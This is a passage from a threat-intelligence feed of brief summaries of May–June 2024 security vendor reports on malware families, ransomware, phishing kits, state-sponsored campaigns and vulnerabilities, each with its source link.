Summary:: Researchers from Sophos have discovered that Chinese state-sponsored hackers targeting Southeast Asian government since March 2022. Sophos investigation identified two groups of hackers, called Cluster Alpha and Cluster Charlie, which seem to be working under a central authority aligned with Chinese interests. Cluster Alpha stopped their activities in August 2023. However, Cluster Charlie resumed their hacking after a short break, using more advanced techniques like web shells and different command and control channels to access networks and steal data.

Source: https://news.sophos.com/en-us/2024/06/05/operation-crimson-palace-sophos-threat-hunting-unveils-multiple-clusters-of-chinese-state-sponsored-activity-targeting-southeast-asia/

Intel Source:: ReversingLabs

Intel Name:: Noise_in_Open_Source_Threat_Detection_is_Detected_by_Python_Downloader

Date of Scan:: 2024-06-06

Impact:: LOW

Summary:: Researchers from ReversingLabs have discovered a malicious, open source package: xFileSyncerx, on the Python Package Index (PyPI). With nearly 300 downloads, this package included malicious wiper components. However, further investigation revealed that these were created by a cybersecurity professional for "red team" penetration testing of a client's Security Operations Center (SOC), not as a genuine open source threat.

Source: https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection

Intel Source:: Binarydefense

Intel Name:: The_analysis_of_the_Wineloader_backdoor_malware

Date of Scan:: 2024-06-06

Impact:: MEDIUM

Summary:: ARC Labs recently analyzed the Wineloader backdoor, a modular malware attributed to the APT29 threat group, which allows further tools or modules to be downloaded through an encrypted command and control channel. It starts with a phishing email luring targets with a wine-tasting event invitation. Executing the obfuscated HTA file downloads the Wineloader payload, which utilizes sideloading and creates scheduled tasks or registry entries for persistence.

Source: https://www.binarydefense.com/resources/blog/wineloader-analysis-of-the-infection-chain/

Intel Source:: Trend Micro

Intel Name:: A_New_Cryptojacking_Attack_Abusing_Docker_Remote_API_Servers_Named_Commando_Cat

Date of Scan:: 2024-06-06

Impact:: LOW

Summary:: Trend Micro researchers discovered an attack campaign abusing exposed Docker remote API servers to deploy cryptocurrency miners. The attack campaign is called Commando Cat since the first stage is to install innocent containers built by the publicly available Commando project (an open-source GitHub project that builds Docker images on-demand for developers).

Source: https://www.trendmicro.com/en_us/research/24/f/commando-cat-a-novel-cryptojacking-attack-.html

Intel Source:: ASEC

Intel Name:: New_detection_of_attacks_targeting_MS_SQL_servers

Date of Scan:: 2024-06-06

Impact:: MEDIUM

Summary:: ASEC always monitors for new attacks targeting of MS-SQL servers and shares new attack case details on their blog. Their details discuss cases in which administrators can utilize a couple of the initial access methods like Brute Force attacks & dictionary attacks and activating Command Execution.

Source: https://asec.ahnlab.com/en/66282/

Intel Source:: Cisco Talos

Intel Name:: DarkGate_switches_up_its_tactics_with_new_payload_email_templates

Date of Scan:: 2024-06-05

Impact:: MEDIUM

Summary:: Cisco Talos has uncovered the malicious email campaign that deliver Darkgate Malware through MS Excel Attachments since March. These emails use a new technique called "Remote Template Injection" to lure users into downloading malware by bypassing email security. Darkgate malware uses new AutoHotkey instead of using older AutoIT scripts. It helps to operate directly in memory without being written to disk. This campaign primarily targets the U.S. with healthcare technologies and telecommunications being the most affected sectors. DarkGate is known for spreading silently, stealing data, avoiding detection, and greatly affecting on both people and organizations. This campaign has switched from using AutoIT to AutoHotkey scripts, showing how DarkGate attackers change tactics to avoid being detected.

Source: https://blog.talosintelligence.com/darkgate-remote-template-injection/

Intel Source:: Arctic Wolf Labs

Intel Name:: Lost_in_the_Fog_A_New_Ransomware_Threat

Date of Scan:: 2024-06-05

Impact:: MEDIUM

Summary:: Arctic Wolf Labs discovered a new ransomware variant known as Fog in May of this year, focusing on U.S. organizations, particularly in the education and recreation sectors. The attackers gained access to systems by exploiting compromised VPN credentials, utilizing techniques like pass-the-hash and credential stuffing, and disabling Windows Defender. They encrypted files stored in VM storage, deleted backups, and left ransom notes containing a unique chat code for communication. Their actions seem a financial motive, primarily targeting the education sector for swift payouts. This highlights the importance of secure backups and strong defenses against such attacks.

Source: https://arcticwolf.com/resources/blog/lost-in-the-fog-a-new-ransomware-threat/

Intel Source:: Trend Micro

Intel Name:: TargetCompany_Linux_Variant_Targeting_ESXi_Environments

Date of Scan:: 2024-06-05

Impact:: LOW

Summary:: Researchers from Trend Micro have discovered a new Linux variant of ransomware used by the TargetCompany group, specifically targeting ESXi environments. This variant employs a custom shell script for payload delivery and execution, marking a departure from previous versions. Additionally, the script sends the victim's information to two separate servers, ensuring the attackers have a backup.

Source: https://www.trendmicro.com/en_us/research/24/f/targetcompany-s-linux-variant-targets-esxi-environments.html

Intel Source:: Infoblox

Intel Name:: DNS_PROBING_OPERATION

Date of Scan:: 2024-06-05

Impact:: LOW

Summary:: Infoblox has uncovered a large-scale operation named Secshow, which has been probing DNS resolvers around the world since 2023 using servers from China's Education and Research Network (CERNET). This operation stands out because of its invasive nature and the large number of questions it raises. Secshow sends DNS queries instructed with information to identify open DNS resolvers and evaluate their behavior. This creates a lot of unnecessary DNS traffic, making it difficult for researchers to accurately study and track malicious activities. The Secshow operation, which involved various techniques for extracting resolver information, ceased in May 2024.

Source: https://blogs.infoblox.com/threat-intelligence/what-a-show-an-amplified-internet-scale-dns-probing-operation/

Intel Source:: Malwarebytes

Intel Name:: Huge_Utility_Scam_Campaign_Using_Online_Advertising_to_Target_Consumers

Date of Scan:: 2024-06-05

Impact:: LOW

Summary:: Researchers at Malwarebytes have discovered a common utility scam that makes use of fake advertisements on the internet. Scammers are taking advantage of those looking for assistance with their energy bills by using sophisticated tactics to extract money and personal data.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/02/massive-utility-scam-campaign-spreads-via-online-ads

Intel Source:: CheckPoint

Intel Name:: Utilizing_BoxedApp_Products_Abuse_to_Spread_Several_Malware_Families

Date of Scan:: 2024-06-05

Impact:: LOW

Summary:: Check Point researchers have been monitoring the increasing abuse of BoxedApp products for a few months and have identified how they are exploited to deploy various known malware families, particularly RATs and stealers. The vast majority of the attributable malicious samples were utilized in attacks on financial institutions and government industries. Packing the malicious payloads allowed the attackers to reduce the detection of existing risks, harden their analysis, and take advantage of the additional capabilities of the BoxedApp SDK (for example, Virtual Storage) without having to construct them from scratch.

Source: https://research.checkpoint.com/2024/inside-the-box-malwares-new-playground/

Intel Source:: ASEC

Intel Name:: SmallTiger_Malware_Targeting_Domestic_Industries

Date of Scan:: 2024-06-05

Impact:: LOW

Summary:: Researchers from ASEC have discovered and responded to attacks involving the SmallTiger malware, which targeted several domestic companies. While the initial method of infiltration remains unclear, the attackers used SmallTiger to move laterally within the organizations. The affected companies include those in the defense sector, automobile parts industry, and semiconductor manufacturing.

Source: https://asec.ahnlab.com/ko/65918/

Intel Source:: ASEC

Intel Name:: A_Caution_Against_Phishing_Emails_That_Request_Pasting_Orders

Date of Scan:: 2024-06-05

Impact:: LOW

Summary:: Researchers from ASEC have found that emails are being used to spread phishing files. The phishing files (HTML) attached to the emails direct users to paste (CTRL+V) and execute the commands. The threat actor sent emails about fee processing, operating instruction reviews, and so on to entice users to open the attachments. When a user open an HTML file, a background and a message masquerading as MS Word show. The notification instructs the user to click the "How to Fix" option to view the Word document offline.

Source: https://asec.ahnlab.com/en/66300/

Intel Source:: Symantec

Intel Name:: RansomHub_Origins_in_Older_Knight

Date of Scan:: 2024-06-05

Impact:: MEDIUM

Summary:: Symantec researchers have discovered a new Ransomware-as-a-Service (RaaS) named RansomHub, which has quickly grown to become one of the largest ransomware groups active today. It is most likely an updated and renamed version of the older Knight ransomware. Analysis of the RansomHub payload indicated a high degree of similarity between the two threats, implying that Knight acts as the starting point for RansomHub.

Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/ransomhub-knight-ransomware

Intel Source:: ISC.SANS

Intel Name:: Exploiting_Avast_Proxy_and_Windows_Security_Center_to_Disable_Windows_Defender

Date of Scan:: 2024-06-05

Impact:: LOW

Summary:: Researchers from ISC.SANS have discovered a utility that can disable Windows Defender by exploiting the Windows Security Center (WSC) registration process. This utility uses a proxy app bundled with Avast to access WSC APIs, registering itself as a fraudulent antivirus provider, which forces Windows Defender to deactivate, though periodic scanning can still be enabled manually.

Source: https://isc.sans.edu/diary/rss/30980

Intel Source:: ASEC

Intel Name:: Threat_Actor_Systems_Can_Be_Exposed_and_Used_by_Other_Threat_Actors

Date of Scan:: 2024-06-05

Impact:: LOW

Summary:: Researchers from ASEC have verified an instance where a ransomware threat actor used a Remote Desktop Protocol (RDP) scan attack to target the proxy server of a CoinMiner attacker. The RDP scan attack by another threat actor was able to access the port that the CoinMiner threat actor opened in order to connect to the proxy server, which allowed them to access an infected botnet. Consequently, an RDP scan attack was conducted against the CoinMiner botnet, causing ransomware to infect it.

Source: https://asec.ahnlab.com/en/66372/

Intel Source:: Trustwave

Intel Name:: Fake_Advanced_IP_Scanner_Installer_Delivers_Dangerous_CobaltStrike_Backdoor

Date of Scan:: 2024-06-05

Impact:: LOW

Summary:: Trustwave SpiderLabs discovered a malicious version of the Advanced IP Scanner installer that contained a malicious DLL. Advanced IP Scanner is a tool used by IT administrators to scan and analyze local networks. This Incident occurred when user downloaded this compromised installer from a typo-squatted website that look like the real site. Hackers have targeted this tool by creating a fake website and using Google Ads to make their site appear high in search results. The fake installer file included a harmful DLL. This DLL is used to inject a CobaltStrike beacon, a tool often used by cybercriminals to control infected systems and steal data. Cybercriminals are using advanced tactics like typo-squatting and fake ads, so staying vigilant is crucial.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/fake-advanced-ip-scanner-installer-delivers-dangerous-cobaltstrike-backdoor/

Intel Source:: Sonatype

Intel Name:: Lumma_Crypto_Stealer_Targeting_Python_Developers

Date of Scan:: 2024-06-05

Impact:: LOW

Summary:: Researchers from Sonatype have discovered a PyPI package called 'crytic-compilers,' which is named very similarly to a well-known legitimate Python library used by cryptocurrency developers. This legitimate library helps in compiling smart contracts, which are digital agreements stored on the blockchain network.

Source: https://www.sonatype.com/blog/crytic-compilers-typosquats-known-crypto-library-drops-windows-trojan

Intel Source:: Sekoia

Intel Name:: PikaBot_Guide_of_Deep_Secrets_and_Operations

Date of Scan:: 2024-06-04

Impact:: MEDIUM

Summary:: Sekoia has conducted an in-depth analysis of the PikaBot Loader, a sophisticated malware loader utilized by cybercriminals since 2023. It is distributed through various methods, such as phishing emails and fake ads, with the goal of infecting numerous systems, particularly those within organizations. Successful compromises with PikaBot often lead to the deployment of the Black Basta ransomware. This malware is intelligently crafted to evade detection by security systems, using tricks to hide its true nature and utilizing advanced techniques for evasion.

Source: https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/

Intel Source:: Fortinet

Intel Name:: Excel_File_Unleashes_Cobalt_Strike_Against_Ukraine

Date of Scan:: 2024-06-04

Impact:: LOW

Summary:: Researchers at FortiGuard have discovered a sophisticated cyberattack involving an Excel file that has a VBA macro embedded in it that is intended to launch a DLL file. The attacker uses a multi-stage malware strategy to deliver the notorious "Cobalt Strike" payload and communicate with a command and control (C2) server. This attack uses various techniques for evasion to guarantee that the payload is successfully delivered.

Source: https://www.fortinet.com/blog/threat-research/menace-unleashed-excel-file-deploys-cobalt-strike-at-ukraine

Intel Source:: Resecurity

Intel Name:: Cybercriminals_Attack_Banking_Customers_In_EU_With_V3B_Phishing_Kit

Date of Scan:: 2024-06-04

Impact:: MEDIUM

Summary:: Resecurity has uncovered a group of cybercriminals providing fraudsters with advanced phishing kits to target banking customers in the European Union. This kit is offered as Phishing-as-a-Service (PaaS) and is designed to capture sensitive information, including credentials and OTP codes. The operation is led by "Vssrtje" since March 2023 and promotes the "V3B" kit on Telegram and Dark Web communities. The panel allows fraudsters to engage with victims and obtain OTP codes for enabling illegal transactions. The V3B kit is regularly updated to evade detection and targets multiple countries in Europe.

Source: https://www.resecurity.com/blog/article/cybercriminals-attack-banking-customers-in-eu-with-v3b-phishing-kit

Intel Source:: Cyble

Intel Name:: UNC1151_Strikes_Against_Ukraine_Ministry_of_Defence

Date of Scan:: 2024-06-04

Impact:: LOW

Summary:: CRIL discovered a campaign by the APT group UNC1151 originating from Belarus and infamous for targeting Eastern European countries. This group is currently focusing on Ukraine's Ministry of Defence in their latest campaign. Attackers use malicious Excel files with VBA macros that drop LNK and DLL files to infect systems. Earlier they use encrypted JPG file for payload but now use encrypted SVG files. They trick users with spam emails to enable macros which then execute malicious code.

Source: https://cyble.com/blog/unc1151-strikes-again-unveiling-their-tactics-against-ukraines-ministry-of-defence

Intel Source:: Trellix

Intel Name:: An_Examination_of_DarkGate_Updates

Date of Scan:: 2024-06-04

Impact:: LOW

Summary:: Trellix researchers have examined the various updates involving the DarkGate author, RastaFarEye, as well as the most recent DarkGate campaigns and versions, diving into the changes and features they contain. This investigation led to the discovery of some servers containing both DarkGate and PikaBot samples, a behavior reported by other security colleagues, most likely due to the operator purchasing both services rather than relying on a single malware family for operations.

Source: https://www.trellix.com/blogs/research/darkgate-again-but-improved/

Intel Source:: CERT-UA

Intel Name:: DarkCrystal_RAT_Targeting_Ukrainian_Officials_via_Signal

Date of Scan:: 2024-06-04

Impact:: LOW

Summary:: CERT-UA researchers have warned of targeted cyber attacks on Ukrainian civil servants, military personnel, and defense industry representatives. Attackers are distributing the DarkCrystal RAT via the Signal messenger app, disguising messages as coming from trusted contacts. The malicious files, disguised as harmless documents, lead to the installation of the RAT, granting unauthorized access to victims' computers.

Source: https://cert.gov.ua/article/6279561

Intel Source:: Talos

Intel Name:: CarnavalHeist_Banking_Trojan_Targeting_Brazilian_Users

Date of Scan:: 2024-06-03

Impact:: LOW

Summary:: Researchers from Cisco Talos have discovered a new banking trojan called CarnavalHeist that targeting Brazilian users with overlay attacks. Talos is confident that this malware originates from Brazil, as the infection process and the malware itself extensively use Portuguese and Brazilian slang for bank names, with no other language variants found. The command and control infrastructure is exclusively based in the BrazilSouth zone on Microsoft Azure and specifically targets major Brazilian banks.

Source: https://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/

Intel Source:: Cyfirma

Intel Name:: Vidar_Stealer_An_Info_Stealing_Malwre

Date of Scan:: 2024-06-03

Impact:: MEDIUM

Summary:: CYFIRMA has spotted a malware-as-a-service (MaaS) called Vidar Stealer, written in C++, which has capabilities and tactics to evade detection. This malware is active since 2018, has evolved to steal sensitive information such as personal data, browser data, cryptocurrency wallets, and financial information from compromised systems. It uses social media platforms like Telegram and Steam for its command-and-control (C2) infrastructure, enabling it to avoid detection and change IP addresses.

Source: https://www.cyfirma.com/research/vidar-stealer-an-in-depth-analysis-of-an-information-stealing-malware/

Intel Source:: Snowflake

Intel Name:: Snowflake_Detecting_and_Preventing_Unauthorized_User_Access

Date of Scan:: 2024-06-03

Impact:: MEDIUM

Summary:: Snowflake has observed a rise in cyber threats targeting some of their customers’ accounts. They believe these attacks aim to steal customer data and are part of wider identity-based attacks in the industry. Their research shows that the attackers are using customer login credentials exposed in unrelated cyber incidents. So far, they don't think this is due to any weakness, or malicious activity within Snowflake itself.

Source: https://community.snowflake.com/s/article/Communication-ID-0108977-Additional-Information

Intel Source:: ASEC

Intel Name:: Botnet_installing_NiceRAT_malware

Date of Scan:: 2024-06-03

Impact:: LOW

Summary:: ASEC has identified that NiceRAT malware was recently installed through a botnet active since 2019. A botnet is a group of devices infected with malicious code and controlled by an attacker. Initially, botnets were used for DDoS attacks, but now they often use malware like NanoCore and Emotet for data theft and installing additional malware. Attackers distribute this malware disguised as genuine Windows or Office tools or game servers through file-sharing sites and blogs. Recently, NanoCore malware, which creates botnets, has been used to install NiceRAT and other malware.

Source: https://asec.ahnlab.com/ko/66040/

Intel Source:: ReliaQuest

Intel Name:: A_New_Execution_Technique_in_ClearFake_Campaign

Date of Scan:: 2024-05-31

Impact:: LOW

Summary:: Researchers at ReliaQuest have uncovered a campaign utilizing novel methods of execution derived from the JavaScript framework "ClearFake": the adversary tricks users into manually copying and executing malicious code in PowerShell. This is not the same as the normal drive-by downloads that are commonly linked to distribution efforts for "fake browser updates," such as ClearFake, when the user is tricked into downloading and executing a malicious payload.

Source: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/

Intel Source:: OpenAI

Intel Name:: OpenAI_Models_Used_in_Nation_State_Influence_Campaigns

Date of Scan:: 2024-05-31

Impact:: LOW

Summary:: Researchers from OpenAI have discovered that malicious actors exploit OpenAI’s generative AI models to craft and spread propaganda on social media, translating content into multiple languages. This activity has exposed disruptions in disinformation campaigns originating from Russia, China, Israel, and Iran. Some individuals were already known to researchers and authorities, with a few previously sanctioned by the US Treasury and banned by Meta.

Source: https://openai.com/index/disrupting-deceptive-uses-of-AI-by-covert-influence-operations/ https://openai.com/index/disrupting-deceptive-uses-of-AI-by-covert-influence-operations/

Intel Source:: Esentire

Intel Name:: The_delivery_of_BitRAT_and_Lumma_Stealer

Date of Scan:: 2024-05-31

Impact:: MEDIUM

Summary:: Esentire detected an instance and detailed the analysis of Lumma Stealer malware's decryption routine and configuration, which targets sensitive data and cryptocurrency wallets. It describes the malware's operation, including its C2 communication, payload deployment, and infection chain involving fake browser updates delivering BitRAT and Lumma Stealer.

Source: https://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer

Intel Source:: Zscaler

Intel Name:: Operation_Endgame_of_Smoke_Malware

Date of Scan:: 2024-05-31

Impact:: MEDIUM

Summary:: Zscaler ThreatLabz conducted the first major joint operation, known as Endgame, with international law enforcement targeting Smoke malware, also known as Dofoil. This malware has been operational since 2011 and is used to deliver second-stage malware, including various trojans, ransomware, and information stealers. Zscaler ThreatLabz has also observed multiple malware families, such as Raspberry Robin, Stealc, and Stop ransomware, being delivered through Smoke. The operation aimed to dismantle Smoke’s infrastructure and remotely clean up infections. Operation Endgame represents the first significant international disruption of Smoke in over a decade and is expected to impact the overall threat ecosystem.

Source: https://www.zscaler.com/blogs/security-research/operation-endgame-smoke

Intel Source:: Sysdig

Intel Name:: The_Rebirth_botnet_analysis

Date of Scan:: 2024-05-31

Impact:: MEDIUM

Summary:: Sysdig researchers provided a comprehensive analysis of the Rebirth botnet and related Linux malware, focusing on detection and mitigation techniques. It highlights the use of deceptive task names and the "/tmp" directory for malware execution. The Rebirth botnet, active since 2019, targets the gaming community for financial gain and DDoS attacks, with key figures like "CazzG" and "Docx69" involved. The botnet spreads via malicious ELF files and uses techniques like `prctl` syscall for process obfuscation. Effective detection requires monitoring suspicious activities and capturing initial payloads to understand malware behavior.

Source: https://sysdig.com/blog/ddos-as-a-service-the-rebirth-botnet/

Intel Source:: Recorded Future

Intel Name:: Russian_Hackers_Targeting_Europe_with_HeadLace_Malware_and_Credential_Harvesting

Date of Scan:: 2024-05-31

Impact:: LOW

Summary:: Researchers at RecordedFuture have observed the evolution of BlueDelta's operational infrastructure, which was utilized to deliver its information-stealing malware Headlace in three discrete phases between April and December 2023. This activity is similar to earlier activities that have been linked to APT28 or Fancy Bear by the Insikt Group, the Computer Emergency Response Team of Ukraine (CERT-UA), and other groups. These groups have previously linked these activities to the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).

Source: https://go.recordedfuture.com/hubfs/reports/CTA-RU-2024-0530.pdf

Intel Source:: Infloblox

Intel Name:: VexTrio_Viper_new_DNS_TDS_domain

Date of Scan:: 2024-05-31

Impact:: LOW

Summary:: Inflobox research center discusses the discovery of a new DNS-based traffic distribution system (TDS) domain, airlogs[.]net, linked to the VexTrio Viper threat actor. It highlights the role of Infoblox's Zero Day DNS™ in identifying such threats, the shift to server-side checks, and the importance of DNS-based security solutions and collaboration in cybersecurity.

Source: https://blogs.infoblox.com/threat-intelligence/vextrio-viper-adds-a-new-dns-tds-domain/

Intel Source:: Microsoft

Intel Name:: Moonstone_Sleet_threat_group_deploys_custom_ransomware

Date of Scan:: 2024-05-31

Impact:: MEDIUM

Summary:: Moonstone Sleet, a North Korean threat actor group, targets sectors like software, IT, education, and defense with espionage and ransomware attacks. They use custom ransomware FakePenny, trojanized software, malicious npm packages, and fake personas, demanding high ransoms.

Source: https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/

Intel Source:: Lumen

Intel Name:: The_Pumpkin_Eclipse

Date of Scan:: 2024-05-31

Impact:: LOW

Summary:: Lumen researchers have discovered a devastating event in which over 600,000 small office/home office (SOHO) routers from a single internet service provider (ISP) were taken offline. The incident occurred over a 72-hour period from October 25 to 27, making the infected machines permanently useless, and necessitated a hardware replacement. During this time period, public scan data revealed the rapid and precipitous removal of 49% of all modems from the affected ISP's autonomous system number (ASN).

Source: https://blog.lumen.com/the-pumpkin-eclipse/

Intel Source:: ASEC

Intel Name:: XMRig_CoinMiner_Installed_via_Game_Emulator

Date of Scan:: 2024-05-31

Impact:: LOW

Summary:: The AhnLab Security Intelligence Center (ASEC) recently discovered that the XMRig CoinMiner is being spread through a game emulator. The malware is distributed via a website offering an emulator for a popular gaming console. When users download the emulator, they receive a compressed file containing a readme.txt with password and troubleshooting guide. Extracting the file reveals an installation guide and the emulator program. However, instead of installing the emulator, running the file creates and executes the CoinMiner using PowerShell commands. Users should download software from official sites.

Source: https://asec.ahnlab.com/en/66114/

Intel Source:: ISC.SANS

Intel Name:: K1w1_InfoStealer_Using_Gofile_io_For_Exfiltration

Date of Scan:: 2024-05-31

Impact:: LOW

Summary:: Researchers at ISC.SANS have examined an interesting script written in Python that is typically difficult for antivirus solutions to detect. Since the string is mentioned in numerous variable and function names, they choose to refer to it as a "k1w1" infostealer. The script has the typical infostealer characteristics of finding relevant data on the victim's computer, but it also employs some novel tactics.

Source: https://isc.sans.edu/diary/rss/30972

Intel Source:: Sonatype

Intel Name:: PyPI_crypto_stealer_attacks_Windows_users

Date of Scan:: 2024-05-31

Impact:: LOW

Summary:: Sonatype's team reveals the "pytoileur" PyPI package targeting Windows users, part of the "Cool package" campaign. It installs trojanized binaries for surveillance and crypto-theft, using obfuscation techniques. Sonatype's detection flagged it after 264 downloads.

Source: https://www.sonatype.com/blog/pypi-crypto-stealer-targets-windows-users-revives-malware-campaign

Intel Source:: ASEC

Intel Name:: Dora_RAT_Against_Korean_Companies

Date of Scan:: 2024-05-31

Impact:: LOW

Summary:: The AhnLab Security Intelligence Center (ASEC) recently uncovered multiple attack cases by the Andariel APT group targeting educational, manufacturing, and construction sectors in Korea. These attacks use various malware such as keyloggers and infostealers to control infected systems and steal data from compromised systems. Attackers have developed new malware, like Dora RAT, to perform basic malicious functions. The group uses vectors like spear phishing, watering hole attacks, and exploiting software flaws to gain access.

Source: https://asec.ahnlab.com/en/66088/

Intel Source:: Mnemonic

Intel Name:: Check_Point_Remote_Access_VPN

Date of Scan:: 2024-05-31

Impact:: LOW

Summary:: A critical vulnerability (CVE-2024-24919) in Check Point Security Gateways with Remote Access VPN enabled allows unauthorized data extraction, including password hashes. With a CVSS score of 7.5, exploitation has been active since April 2024. Mitigation includes updates, user removal, and log searches.

Source: https://www.mnemonic.io/resources/blog/advisory-check-point-remote-access-vpn-vulnerability-cve-2024-24919/

Intel Source:: Lab52

Intel Name:: DLL_Side_Loading_through_IObit_against_Colombia

Date of Scan:: 2024-05-31

Impact:: LOW

Summary:: Lab52 researchers have uncovered new phishing campaign in Colombia in May 2024 where attackers pretended to be from the Colombian Attorney General’s Office. The campaign aims to infect victims’ systems with the AsyncRAT malware using a sophisticated method involving legitimate software and a series of malicious files. In this campaign attackers are using legitimate ZIP file with IOBIT anti-malware program. This malware also uses Apple audio file and VCF file to inject AsyncRAT malware.

Source: https://lab52.io/blog/dll-side-loading-through-iobit-against-colombia/

Intel Source:: Cloudflare

Intel Name:: FlyingYeti_campaign_targeting_Ukraine

Date of Scan:: 2024-05-30

Impact:: LOW

Summary:: Cloudforce researchers have uncovered the latest phishing campaign of FlyingYeti, a threat group aligned with Russia, targeting Ukraine. The threat actor group taking advantage of Ukraine's situation with housing and utility debts after Russia's attack. They manipulate people's fears of losing access to crucial services. The threat actors distribute COOKBOX, a dangerous PowerShell malware to gain control over victims' systems. Their phishing campaign masquerades as a legitimate housing site, deceiving individuals into downloading malware disguised as documents related to debt.

Source: https://blog.cloudflare.com/disrupting-flyingyeti-campaign-targeting-ukraine

Intel Source:: Cybereason

Intel Name:: Supply_Chaining_Into_SSH_Using_XZ_Backdoor

Date of Scan:: 2024-05-30

Impact:: MEDIUM

Summary:: Cybereason researchers have observed a sophisticated backdoor in the open-source compression library XZ Utils versions 5.6.0 and 5.6.1 for the Linux operating system. A common compression format in Linux, XZ may be found in most commercial and open-source distributions. Large files are compressed into smaller ones for easy sharing and transferring.

Source: https://www.cybereason.com/blog/threat-alert-the-xz-backdoor

Intel Source:: Trend Micro

Intel Name:: Analyzing_Water_Sigbins_Most_Recent_Obfuscation_Techniques

Date of Scan:: 2024-05-30

Impact:: LOW

Summary:: TrendMicro researchers have observed that Water Sigbin (aka the 8220 Gang) is a China-based threat actor active since at least 2017. It mostly deploys cryptocurrency-mining malware in cloud-based systems and on Linux servers. The group is notable for incorporating vulnerability exploitation into its diverse set of TTPs. Using a PowerShell script, Water Sigbin deployed a cryptocurrency miner by taking advantage of vulnerabilities CVE-2017-3506 and CVE-2023-21839. The group used obfuscation techniques such as hexadecimal encoding of URLs and HTTP over port 443, which allowed for covert payload distribution.

Source: https://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html

Intel Source:: ASEC

Intel Name:: Malware_Distribution_Disguised_as_Cracked_Versions_of_Microsoft_Office

Date of Scan:: 2024-05-30

Impact:: LOW

Summary:: Researchers from ASEC have previously shared information about an attack instance in which a threat actor distributed CoinMiner and RAT to Korean users. The attacker created and distributed several malware strains up until recently, including downloaders, CoinMiner, RAT, Proxy, and AntiAV. Malware strains distributed under the guise of cracked versions of legitimate programs, including Hangul Word Processor or Windows or Microsoft Office activation tools, frequently infect many systems in South Korea.

Source: https://asec.ahnlab.com/en/66017/

Intel Source:: ASEC

Intel Name:: The_distribution_of_XWorm_v5_6_malware

Date of Scan:: 2024-05-30

Impact:: MEDIUM

Summary:: Researchers discovered a campaign distributing the XWorm v5.6 malware disguised as adult games through Korean file-sharing platforms called webhards. The malware employs tactics like downloading encrypted components from command-and-control servers, injecting itself into legitimate processes, and conducting activities like keylogging, webcam data exfiltration, and additional malware downloads.

Source: https://asec.ahnlab.com/en/66099/

Intel Source:: ReliaQuest

Intel Name:: Diving_Deep_into_Common_Infostealers

Date of Scan:: 2024-05-30

Impact:: LOW

Summary:: ReliaQuest researchers discovered a considerable increase in information-stealing (infostealer) malware activity in the cyber threat landscape, with a 30.5% increase in marketplace listings for "stealer logs" between Q3 and Q4 2023. In addition to describing the targeted industries and regions as well as the tactics, techniques, and procedures (TTPs) used, the report provides a basic overview of typical infostealer types and suggests best practices for mitigation.

Source: https://www.reliaquest.com/blog/common-infostealers/

Intel Source:: Talos

Intel Name:: The_stealthy_trilogy_of_PurpleInk_InkBox_and_InkLoader

Date of Scan:: 2024-05-30

Impact:: MEDIUM

Summary:: A new data theft campaign was attributed to an advanced persistent threat actor called 'LilacSquid'. The campaign targets diverse victims across various sectors in the United States, Europe, and Asia. It employs MeshAgent, an open-source remote management tool, and a customized version of QuasarRAT called 'PurpleInk' as primary implants after compromising vulnerable internet-facing application servers. LilacSquid leverages vulnerabilities and compromised RDP credentials to deploy tools like MeshAgent, SSF, PurpleInk, and two malware loaders called 'InkBox' and 'InkLoader' for establishing long-term access and data exfiltration.

Source: https://blog.talosintelligence.com/lilacsquid/

Intel Source:: Akamai

Intel Name:: RedTail_Cryptominer_Malware

Date of Scan:: 2024-05-30

Impact:: LOW

Summary:: Akamai researchers have discovered that the RedTail cryptomining malware was first observed in early 2024, now exploits a new vulnerability in Palo Alto's PAN-OS (CVE-2024-3400) to execute commands with root privileges. The attackers have enhanced their tactics by using private cryptomining pools and new anti-research techniques. The malware spreads through multiple web exploits targeting IoT devices, web applications, and security devices. This malware has been active from April to May 2024 and is efficient at evading detection with advanced techniques.

Source: https://www.akamai.com/blog/security-research/2024-redtail-cryptominer-pan-os-cve-exploit

Intel Source:: Silentpush

Intel Name:: Discovering_CryptoChameleon_fast_flux_IOFAs

Date of Scan:: 2024-05-30

Impact:: LOW

Summary:: A report detailing the analysis of the CryptoChameleon phishing kit, which is used to harvest sensitive information from employees and customers across various platforms. Silent Push Threat Analysts conducted research that revealed a large number of fast flux Indicators of Future Attack (IOFAs) targeting cryptocurrency exchanges, tech companies, and other platforms, using techniques like DNSPod nameservers and fast flux evasion. The report provides background on CryptoChameleon, its tactics and techniques, and the associated infrastructure discovered by Silent Push.

Source: https://www.silentpush.com/blog/cryptochameleon/

Intel Source:: Threat Fabric

Intel Name:: The_macOS_Implant_LightSpy

Date of Scan:: 2024-05-30

Impact:: LOW

Summary:: Researchers at Threat Fabric have noticed that LightSpy for macOS is similar to a campaign that was conducted a few years back. Even yet, exploring this advanced spyware toolset was still interesting since it provided information about the objectives of the threat actor and the specific information they were looking for. It became clear that the threat actor group concentrated on listening in on victim communications, including voice recordings and messenger conversations, irrespective of the platform they were targeting. A dedicated network discovery plugin for macOS was created with the goal of locating devices close to the victim.

Source: https://www.threatfabric.com/blogs/lightspy-implant-for-macos

Intel Source:: Seqrite

Intel Name:: The_exposure_of_AsukaStealer_malware

Date of Scan:: 2024-05-30

Impact:: LOW

Summary:: AsukaStealer, a malware thta is designed to infiltrate popular browsers and extract sensitive data like credentials, cookies, and extension data. It also targets cryptocurrency wallets, messaging platforms, and gaming software. The malware employs customizable configurations, a user-friendly interface, and advanced techniques like API hashing and C2 communication. With capabilities like file exfiltration, screenshot capturing, and coin mining, AsukaStealer poses a significant threat to individuals and organizations.

Source: https://www.seqrite.com/blog/unmasking-asukastealer-the-80-malware-threatening-your-digital-security/

Intel Source:: Qianxin

Intel Name:: The_abuse_of_Kiteshield_Packer

Date of Scan:: 2024-05-29

Impact:: LOW

